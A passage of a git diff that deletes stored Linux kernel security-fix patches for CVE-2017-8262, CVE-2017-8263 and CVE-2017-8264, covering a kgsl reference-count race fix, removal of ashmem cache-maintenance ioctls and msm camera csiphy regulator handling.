-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L21zbS9rZ3NsLmMgYi9kcml2ZXJzL2dwdS9tc20va2dzbC5jCmluZGV4IDY0MGU2YzEuLjU3ZTNlYTMgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvZ3B1L21zbS9rZ3NsLmMKKysrIGIvZHJpdmVycy9ncHUvbXNtL2tnc2wuYwpAQCAtMSw0ICsxLDQgQEAKLS8qIENvcHlyaWdodCAoYykgMjAwOC0yMDE2LCBUaGUgTGludXggRm91bmRhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC4KKy8qIENvcHlyaWdodCAoYykgMjAwOC0yMDE3LCBUaGUgTGludXggRm91bmRhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC4KICAqCiAgKiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogICogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSB2ZXJzaW9uIDIgYW5kCkBAIC0xNjcsOCArMTY3LDExIEBACiB7CiAJc3RydWN0IGtnc2xfbWVtX2VudHJ5ICplbnRyeSA9IGt6YWxsb2Moc2l6ZW9mKCplbnRyeSksIEdGUF9LRVJORUwpOwogCi0JaWYgKGVudHJ5KQorCWlmIChlbnRyeSkgewogCQlrcmVmX2luaXQoJmVudHJ5LT5yZWZjb3VudCk7CisJCS8qIHB1dCB0aGlzIHJlZiBpbiB0aGUgY2FsbGVyIGZ1bmN0aW9ucyBhZnRlciBpbml0ICovCisJCWtyZWZfZ2V0KCZlbnRyeS0+cmVmY291bnQpOworCX0KIAogCXJldHVybiBlbnRyeTsKIH0KQEAgLTMwMTksNiArMzAyMiw5IEBACiAJdHJhY2Vfa2dzbF9tZW1fbWFwKGVudHJ5LCBwYXJhbS0+ZmQpOwogCiAJa2dzbF9tZW1fZW50cnlfY29tbWl0X3Byb2Nlc3MocHJpdmF0ZSwgZW50cnkpOworCisJLyogcHV0IHRoZSBleHRyYSByZWZjb3VudCBmb3Iga2dzbF9tZW1fZW50cnlfY3JlYXRlKCkgKi8KKwlrZ3NsX21lbV9lbnRyeV9wdXQoZW50cnkpOwogCXJldHVybiByZXN1bHQ7CiAKIGVycm9yX2F0dGFjaDoKQEAgLTMzNDMsNiArMzM0OSw5IEBACiAJcGFyYW0tPmZsYWdzID0gZW50cnktPm1lbWRlc2MuZmxhZ3M7CiAKIAlrZ3NsX21lbV9lbnRyeV9jb21taXRfcHJvY2Vzcyhwcml2YXRlLCBlbnRyeSk7CisKKwkvKiBwdXQgdGhlIGV4dHJhIHJlZmNvdW50IGZvciBrZ3NsX21lbV9lbnRyeV9jcmVhdGUoKSAqLworCWtnc2xfbWVtX2VudHJ5X3B1dChlbnRyeSk7CiAJcmV0dXJuIHJlc3VsdDsKIGVycjoKIAlrZ3NsX3NoYXJlZG1lbV9mcmVlKCZlbnRyeS0+bWVtZGVzYyk7CkBAIC0zMzgyLDYgKzMzOTEsOSBAQAogCXBhcmFtLT5ncHVhZGRyID0gZW50cnktPm1lbWRlc2MuZ3B1YWRkcjsKIAogCWtnc2xfbWVtX2VudHJ5X2NvbW1pdF9wcm9jZXNzKHByaXZhdGUsIGVudHJ5KTsKKworCS8qIHB1dCB0aGUgZXh0cmEgcmVmY291bnQgZm9yIGtnc2xfbWVtX2VudHJ5X2NyZWF0ZSgpICovCisJa2dzbF9tZW1fZW50cnlfcHV0KGVudHJ5KTsKIAlyZXR1cm4gcmVzdWx0OwogZXJyOgogCWlmIChlbnRyeSkK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8262/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8262/3.18/0002.patch
deleted file mode 100644
index f0df1059..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8262/3.18/0002.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From 20c8f1c393ec2726ac46642ae8883643f2427c4f Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Thu, 6 Apr 2017 16:56:47 +0530
-Subject: msm: kgsl: Fix kgsl memory allocation and free race condition
-
-When allocating userspace memory keep reference to memory
-allocation till it is completely initialized and info is sent back
-to userspace.
-
-Change-Id: Id72c82bf98c094ecbd4722813c732a998dcbb188
-Signed-off-by: Tarun Karra <tkarra@codeaurora.org>
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 0ba75e0..8f6ff24 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -250,8 +250,11 @@ kgsl_mem_entry_create(void)
- {
- 	struct kgsl_mem_entry *entry = kzalloc(sizeof(*entry), GFP_KERNEL);
- 
--	if (entry != NULL)
-+	if (entry != NULL) {
- 		kref_init(&entry->refcount);
-+		/* put this ref in the caller functions after init */
-+		kref_get(&entry->refcount);
-+	}
- 
- 	return entry;
- }
-@@ -2300,6 +2303,9 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
- 	trace_kgsl_mem_map(entry, fd);
- 
- 	kgsl_mem_entry_commit_process(entry);
-+
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return 0;
- 
- unmap:
-@@ -2606,6 +2612,9 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 	trace_kgsl_mem_map(entry, param->fd);
- 
- 	kgsl_mem_entry_commit_process(entry);
-+
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return result;
- 
- error_attach:
-@@ -3044,6 +3053,8 @@ long kgsl_ioctl_gpuobj_alloc(struct kgsl_device_private *dev_priv,
- 	param->mmapsize = kgsl_memdesc_footprint(&entry->memdesc);
- 	param->id = entry->id;
- 
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return 0;
- }
- 
-@@ -3067,6 +3078,8 @@ long kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- 	param->size = (size_t) entry->memdesc.size;
- 	param->flags = (unsigned int) entry->memdesc.flags;
- 
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return 0;
- }
- 
-@@ -3090,6 +3103,8 @@ long kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- 	param->mmapsize = (size_t) kgsl_memdesc_footprint(&entry->memdesc);
- 	param->gpuaddr = (unsigned long) entry->memdesc.gpuaddr;
- 
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8262/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8262/4.4/0003.patch
deleted file mode 100644
index 580dc9b9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8262/4.4/0003.patch
+++ /dev/null
@@ -1,107 +0,0 @@
-From 9ef4ee8e3dfaf4e796bda781826851deebbd89bd Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Fri, 7 Apr 2017 17:00:55 +0530
-Subject: msm: kgsl: Fix kgsl memory allocation and free race condition
-
-When allocating userspace memory keep reference to memory
-allocation till it is completely initialized and info is sent back
-to userspace.
-
-Change-Id: Id72c82bf98c094ecbd4722813c732a998dcbb188
-Signed-off-by: Tarun Karra <tkarra@codeaurora.org>
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 26 +++++++++++++++++++++++++-
- 1 file changed, 25 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 1de8e21..e49b39f 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -260,9 +260,12 @@ kgsl_mem_entry_create(void)
- {
- 	struct kgsl_mem_entry *entry = kzalloc(sizeof(*entry), GFP_KERNEL);
- 
--	if (entry != NULL)
-+	if (entry != NULL) {
- 		kref_init(&entry->refcount);
- 
-+		/* put this ref in the caller functions after init */
-+		kref_get(&entry->refcount);
-+	}
- 	return entry;
- }
- #ifdef CONFIG_DMA_SHARED_BUFFER
-@@ -2399,6 +2402,9 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
- 	trace_kgsl_mem_map(entry, fd);
- 
- 	kgsl_mem_entry_commit_process(entry);
-+
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return 0;
- 
- unmap:
-@@ -2705,6 +2711,9 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 	trace_kgsl_mem_map(entry, param->fd);
- 
- 	kgsl_mem_entry_commit_process(entry);
-+
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return result;
- 
- error_attach:
-@@ -3143,6 +3152,9 @@ long kgsl_ioctl_gpuobj_alloc(struct kgsl_device_private *dev_priv,
- 	param->mmapsize = kgsl_memdesc_footprint(&entry->memdesc);
- 	param->id = entry->id;
- 
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
-+
- 	return 0;
- }
- 
-@@ -3166,6 +3178,9 @@ long kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- 	param->size = (size_t) entry->memdesc.size;
- 	param->flags = (unsigned int) entry->memdesc.flags;
- 
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
-+
- 	return 0;
- }
- 
-@@ -3189,6 +3204,9 @@ long kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- 	param->mmapsize = (size_t) kgsl_memdesc_footprint(&entry->memdesc);
- 	param->gpuaddr = (unsigned long) entry->memdesc.gpuaddr;
- 
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
-+
- 	return 0;
- }
- 
-@@ -3306,6 +3324,9 @@ long kgsl_ioctl_sparse_phys_alloc(struct kgsl_device_private *dev_priv,
- 	trace_sparse_phys_alloc(entry->id, param->size, param->pagesize);
- 	kgsl_mem_entry_commit_process(entry);
- 
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
-+
- 	return 0;
- 
- err_invalid_pages:
-@@ -3385,6 +3406,9 @@ long kgsl_ioctl_sparse_virt_alloc(struct kgsl_device_private *dev_priv,
- 	trace_sparse_virt_alloc(entry->id, param->size, param->pagesize);
- 	kgsl_mem_entry_commit_process(entry);
- 
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
-+
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8263/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8263/ANY/0001.patch
deleted file mode 100644
index 61f054bd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8263/ANY/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 2a2f0b7463f4de9ca225769204ff62c71760709c Mon Sep 17 00:00:00 2001
-From: Sudarshan Rajagopalan <sudaraja@codeaurora.org>
-Date: Thu, 6 Apr 2017 16:15:48 -0700
-Subject: ashmem: remove cache maintenance support
-
-The cache maintenance routines in ashmem were causing
-several security issues. Since they are not being used
-anymore by any drivers, its well to remove them entirely.
-
-CRs-Fixed: 1107034, 2001129, 2007786
-Change-Id: I955e33d90b888d58db5cf6bb490905283374425b
-Signed-off-by: Sudarshan Rajagopalan <sudaraja@codeaurora.org>
----
- drivers/staging/android/ashmem.c | 41 ----------------------------------------
- include/uapi/linux/ashmem.h      |  3 ---
- 2 files changed, 44 deletions(-)
-
-diff --git a/drivers/staging/android/ashmem.c b/drivers/staging/android/ashmem.c
-index ee79ac8..f13aab2 100644
---- a/drivers/staging/android/ashmem.c
-+++ b/drivers/staging/android/ashmem.c
-@@ -32,7 +32,6 @@
- #include <linux/mutex.h>
- #include <linux/shmem_fs.h>
- #include <linux/ashmem.h>
--#include <asm/cacheflush.h>
- 
- #include "ashmem.h"
- 
-@@ -659,37 +658,6 @@ static int ashmem_pin_unpin(struct ashmem_area *asma, unsigned long cmd,
- 	return ret;
- }
- 
--static int ashmem_cache_op(struct ashmem_area *asma,
--	void (*cache_func)(const void *vstart, const void *vend))
--{
--	int ret = 0;
--	struct vm_area_struct *vma;
--	if (!asma->vm_start)
--		return -EINVAL;
--
--	down_read(&current->mm->mmap_sem);
--	vma = find_vma(current->mm, asma->vm_start);
--	if (!vma) {
--		ret = -EINVAL;
--		goto done;
--	}
--	if (vma->vm_file != asma->file) {
--		ret = -EINVAL;
--		goto done;
--	}
--	if ((asma->vm_start + asma->size) > vma->vm_end) {
--		ret = -EINVAL;
--		goto done;
--	}
--	cache_func((void *)asma->vm_start,
--			(void *)(asma->vm_start + asma->size));
--done:
--	up_read(&current->mm->mmap_sem);
--	if (ret)
--		asma->vm_start = 0;
--	return ret;
--}
--
- static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- {
- 	struct ashmem_area *asma = file->private_data;
-@@ -735,15 +703,6 @@ static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 			ashmem_shrink(&ashmem_shrinker, &sc);
- 		}
- 		break;
--	case ASHMEM_CACHE_FLUSH_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_flush_range);
--		break;
--	case ASHMEM_CACHE_CLEAN_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_clean_range);
--		break;
--	case ASHMEM_CACHE_INV_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_inv_range);
--		break;
- 	}
- 
- 	return ret;
-diff --git a/include/uapi/linux/ashmem.h b/include/uapi/linux/ashmem.h
-index 7ec977f..7797439 100644
---- a/include/uapi/linux/ashmem.h
-+++ b/include/uapi/linux/ashmem.h
-@@ -34,8 +34,5 @@ struct ashmem_pin {
- #define ASHMEM_UNPIN		_IOW(__ASHMEMIOC, 8, struct ashmem_pin)
- #define ASHMEM_GET_PIN_STATUS	_IO(__ASHMEMIOC, 9)
- #define ASHMEM_PURGE_ALL_CACHES	_IO(__ASHMEMIOC, 10)
--#define ASHMEM_CACHE_FLUSH_RANGE	_IO(__ASHMEMIOC, 11)
--#define ASHMEM_CACHE_CLEAN_RANGE	_IO(__ASHMEMIOC, 12)
--#define ASHMEM_CACHE_INV_RANGE		_IO(__ASHMEMIOC, 13)
- 
- #endif /* _UAPI_LINUX_ASHMEM_H */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8264/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8264/3.10/0001.patch
deleted file mode 100644
index f5bb668f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8264/3.10/0001.patch
+++ /dev/null
@@ -1,235 +0,0 @@
-From 4268b75208ca04bc63dcfadbb9a1eca8e964a697 Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Wed, 10 May 2017 11:39:45 -0700
-Subject: BACKPORT: msm: camera: Add regulator enable and disable independent
- of CSID
-
-Regulator enable and disable of CSIPHY depends on the CSID module.
-Make the enable and disable of clk regulator independent of CSIPHY.
-
-Bug: 33299365
-CRs-Fixed: 1107702
-Change-Id: Iabb5eb28d63b34a4c3201c53be17054a1907f4fe
-Signed-off-by: Ravi Kishore Tanuku <rktanuku@codeaurora.org>
-Signed-off-by: VijayaKumar T M <vtmuni@codeaurora.org>
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
-(cherry picked from commit b1bb44c9cca61e48ec6158abad6e7969a8e58abf)
----
- arch/arm/boot/dts/qcom/apq8084-camera.dtsi         |  6 ++
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.c       | 95 +++++++++++++++++++++-
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.h       |  2 +
- 3 files changed, 102 insertions(+), 1 deletion(-)
-
-diff --git a/arch/arm/boot/dts/qcom/apq8084-camera.dtsi b/arch/arm/boot/dts/qcom/apq8084-camera.dtsi
-index 2d7e126..abc85bf9 100644
---- a/arch/arm/boot/dts/qcom/apq8084-camera.dtsi
-+++ b/arch/arm/boot/dts/qcom/apq8084-camera.dtsi
-@@ -26,6 +26,8 @@
- 		reg-names = "csiphy", "csiphy_clk_mux";
- 		interrupts = <0 78 0>;
- 		interrupt-names = "csiphy";
-+		qcom,csi-vdd-voltage = <1800000>;
-+		qcom,mipi-csi-vdd-supply = <&pma8084_l12>;
- 	};
- 
- 	qcom,csiphy@fda0b000 {
-@@ -36,6 +38,8 @@
- 		reg-names = "csiphy", "csiphy_clk_mux";
- 		interrupts = <0 79 0>;
- 		interrupt-names = "csiphy";
-+		qcom,csi-vdd-voltage = <1800000>;
-+		qcom,mipi-csi-vdd-supply = <&pma8084_l12>;
- 	};
- 
- 	qcom,csiphy@fda0b400 {
-@@ -46,6 +50,8 @@
- 		reg-names = "csiphy", "csiphy_clk_mux";
- 		interrupts = <0 80 0>;
- 		interrupt-names = "csiphy";
-+		qcom,csi-vdd-voltage = <1800000>;
-+		qcom,mipi-csi-vdd-supply = <&pma8084_l12>;
- 	};
- 
- 	qcom,csid@fda08000  {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-index 8aac9b6..5301b33 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2014, 2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -28,6 +28,10 @@
- #define CSIPHY_VERSION_V30                        0x10
- #define MSM_CSIPHY_DRV_NAME                      "msm_csiphy"
- 
-+static struct camera_vreg_t csiphy_vreg_info[] = {
-+	{"qcom,mipi-csi-vdd", 0, 0, 12000},
-+};
-+
- #undef CDBG
- #ifdef CONFIG_MSMB_CAMERA_DEBUG
- #define CDBG(fmt, args...) pr_err(fmt, ##args)
-@@ -205,6 +209,21 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 	}
- 	CDBG("%s:%d called\n", __func__, __LINE__);
- 
-+	rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 1);
-+	if (rc < 0) {
-+		pr_err("%s: regulator config failed\n", __func__);
-+		goto csiphy_vreg_config_fail;
-+	}
-+	rc = msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 1);
-+	if (rc < 0) {
-+		pr_err("%s: regulator enable failed\n", __func__);
-+		goto csiphy_vreg_enable_fail;
-+	}
-+
- 	if (CSIPHY_VERSION == CSIPHY_VERSION_V22) {
- 		rc = msm_cam_clk_enable(&csiphy_dev->pdev->dev,
- 			csiphy_8610_clk_info, csiphy_dev->csiphy_clk,
-@@ -268,6 +287,16 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 		csiphy_dev->hw_version);
- 	csiphy_dev->csiphy_state = CSIPHY_POWER_UP;
- 	return 0;
-+
-+csiphy_vreg_enable_fail:
-+	rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 0);
-+csiphy_vreg_config_fail:
-+	iounmap(csiphy_dev->base);
-+	csiphy_dev->base = NULL;
-+	return rc;
-+
- }
- #else
- static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
-@@ -303,6 +332,22 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 		rc = -ENOMEM;
- 		return rc;
- 	}
-+
-+	rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 1);
-+	if (rc < 0) {
-+		pr_err("%s: regulator config failed\n", __func__);
-+		goto csiphy_vreg_config_fail;
-+	}
-+	rc = msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 1);
-+	if (rc < 0) {
-+		pr_err("%s: regulator enable failed\n", __func__);
-+		goto csiphy_vreg_enable_fail;
-+	}
-+
- 	if (CSIPHY_VERSION == CSIPHY_VERSION_V22) {
- 		rc = msm_cam_clk_enable(&csiphy_dev->pdev->dev,
- 			csiphy_8610_clk_info, csiphy_dev->csiphy_clk,
-@@ -364,6 +409,15 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 		csiphy_dev->hw_version);
- 	csiphy_dev->csiphy_state = CSIPHY_POWER_UP;
- 	return 0;
-+
-+csiphy_vreg_enable_fail:
-+	rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 0);
-+csiphy_vreg_config_fail:
-+	iounmap(csiphy_dev->base);
-+	csiphy_dev->base = NULL;
-+	return rc;
- }
- #endif
- 
-@@ -445,6 +499,19 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 			ARRAY_SIZE(csiphy_clk_info), 0);
- 			iounmap(csiphy_dev->clk_mux_base);
- 	}
-+
-+	msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 0);
-+	msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 0);
-+
-+	if (!IS_ERR_OR_NULL(csiphy_dev->reg_ptr)) {
-+		regulator_disable(csiphy_dev->reg_ptr);
-+		regulator_put(csiphy_dev->reg_ptr);
-+	}
-+
- 	iounmap(csiphy_dev->base);
- 	csiphy_dev->base = NULL;
- 	csiphy_dev->csiphy_state = CSIPHY_POWER_DOWN;
-@@ -527,6 +594,18 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 			iounmap(csiphy_dev->clk_mux_base);
- 	}
- 
-+	msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 0);
-+	msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+		NULL, 0, &csiphy_dev->csi_vdd, 0);
-+
-+	if (!IS_ERR_OR_NULL(csiphy_dev->reg_ptr)) {
-+		regulator_disable(csiphy_dev->reg_ptr);
-+		regulator_put(csiphy_dev->reg_ptr);
-+	}
-+
- 	iounmap(csiphy_dev->base);
- 	csiphy_dev->base = NULL;
- 	csiphy_dev->csiphy_state = CSIPHY_POWER_DOWN;
-@@ -630,6 +709,7 @@ static const struct v4l2_subdev_ops msm_csiphy_subdev_ops = {
- static int csiphy_probe(struct platform_device *pdev)
- {
- 	struct csiphy_device *new_csiphy_dev;
-+	uint32_t csi_vdd_voltage = 0;
- 	int rc = 0;
- 
- 	new_csiphy_dev = kzalloc(sizeof(struct csiphy_device), GFP_KERNEL);
-@@ -649,6 +729,19 @@ static int csiphy_probe(struct platform_device *pdev)
- 			"cell-index", &pdev->id);
- 	CDBG("%s: device id = %d\n", __func__, pdev->id);
- 
-+	rc = of_property_read_u32((&pdev->dev)->of_node,
-+		"qcom,csi-vdd-voltage", &csi_vdd_voltage);
-+	if (rc < 0) {
-+		pr_err("%s:%d failed to read qcom,csi-vdd-voltage\n",
-+			__func__, __LINE__);
-+		return rc;
-+	}
-+	CDBG("%s:%d reading mipi_csi_vdd is %d\n", __func__, __LINE__,
-+		csi_vdd_voltage);
-+
-+	csiphy_vreg_info[0].min_voltage = csi_vdd_voltage;
-+	csiphy_vreg_info[0].max_voltage = csi_vdd_voltage;
-+
- 	new_csiphy_dev->mem = platform_get_resource_byname(pdev,
- 					IORESOURCE_MEM, "csiphy");
- 	if (!new_csiphy_dev->mem) {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-index ff97ab7..3c843a2 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-@@ -47,6 +47,8 @@ struct csiphy_device {
- 
- 	int32_t ref_count;
- 	uint16_t lane_mask[MAX_CSIPHY];
-+	struct regulator *csi_vdd;
-+	struct regulator *reg_ptr;
- };
- 
- #define VIDIOC_MSM_CSIPHY_RELEASE \
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8264/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8264/3.18/0002.patch
deleted file mode 100644
index 0fda518e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8264/3.18/0002.patch
+++ /dev/null
@@ -1,316 +0,0 @@
-From 53c6b89349730765a71722d274fc3fa41287d21f Mon Sep 17 00:00:00 2001
-From: Ravi Kishore Tanuku <rktanuku@codeaurora.org>
-Date: Wed, 22 Feb 2017 20:00:13 +0530
-Subject: msm: camera: Add regulator enable and disable independent of CSID
-
-Regulator enable and disable of CSIPHY depends on the CSID module.
-Make the enable and disable of clk regulator independent of CSIPHY.
-
-CRs-Fixed: 1107702
-Change-Id: Iabb5eb28d63b34a4c3201c53be17054a1907f4fe
-Signed-off-by: Ravi Kishore Tanuku <rktanuku@codeaurora.org>
----
- arch/arm/boot/dts/qcom/msm8996-camera.dtsi         | 38 ++++++---
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.c       | 94 ++++++++++++++++++++--
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.h       |  6 +-
- 3 files changed, 120 insertions(+), 18 deletions(-)
-
-diff --git a/arch/arm/boot/dts/qcom/msm8996-camera.dtsi b/arch/arm/boot/dts/qcom/msm8996-camera.dtsi
-index 3e1a889..e4960d0 100644
---- a/arch/arm/boot/dts/qcom/msm8996-camera.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8996-camera.dtsi
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -28,18 +28,24 @@
- 		reg-names = "csiphy", "csiphy_clk_mux";
- 		interrupts = <0 78 0>;
- 		interrupt-names = "csiphy";
--		clocks = <&clock_mmss clk_camss_top_ahb_clk>,
-+		qcom,csi-vdd-voltage = <1250000>;
-+		qcom,mipi-csi-vdd-supply = <&pm8994_l2>;
-+		mmagic-supply = <&gdsc_mmagic_camss>;
-+		gdscr-supply = <&gdsc_camss_top>;
-+		qcom,cam-vreg-name = "mmagic", "gdscr";
-+		clocks = <&clock_mmss clk_mmss_mmagic_ahb_clk>,
-+			<&clock_mmss clk_camss_top_ahb_clk>,
- 			<&clock_mmss clk_camss_ispif_ahb_clk>,
- 			<&clock_mmss clk_csi0phytimer_clk_src>,
- 			<&clock_mmss clk_camss_csi0phytimer_clk>,
- 			<&clock_mmss clk_camss_ahb_clk>,
- 			<&clock_mmss clk_csiphy0_3p_clk_src>,
- 			<&clock_mmss clk_camss_csiphy0_3p_clk>;
--		clock-names = "camss_top_ahb_clk",
-+		clock-names = "mmagic_ahb_clk", "camss_top_ahb_clk",
- 			"ispif_ahb_clk", "csiphy_timer_src_clk",
- 			"csiphy_timer_clk", "camss_ahb_clk",
- 			"csiphy_3p_clk_src", "csi_phy_3p_clk";
--		qcom,clock-rates = <0 0 200000000 0 0 100000000 0>;
-+		qcom,clock-rates = <0 0 0 200000000 0 0 100000000 0>;
- 	};
- 
- 	qcom,csiphy@a35000 {
-@@ -49,18 +55,24 @@
- 		reg-names = "csiphy", "csiphy_clk_mux";
- 		interrupts = <0 79 0>;
- 		interrupt-names = "csiphy";
--		clocks = <&clock_mmss clk_camss_top_ahb_clk>,
-+		qcom,csi-vdd-voltage = <1250000>;
-+		qcom,mipi-csi-vdd-supply = <&pm8994_l2>;
-+		mmagic-supply = <&gdsc_mmagic_camss>;
-+		gdscr-supply = <&gdsc_camss_top>;
-+		qcom,cam-vreg-name = "mmagic", "gdscr";
-+		clocks = <&clock_mmss clk_mmss_mmagic_ahb_clk>,
-+			<&clock_mmss clk_camss_top_ahb_clk>,
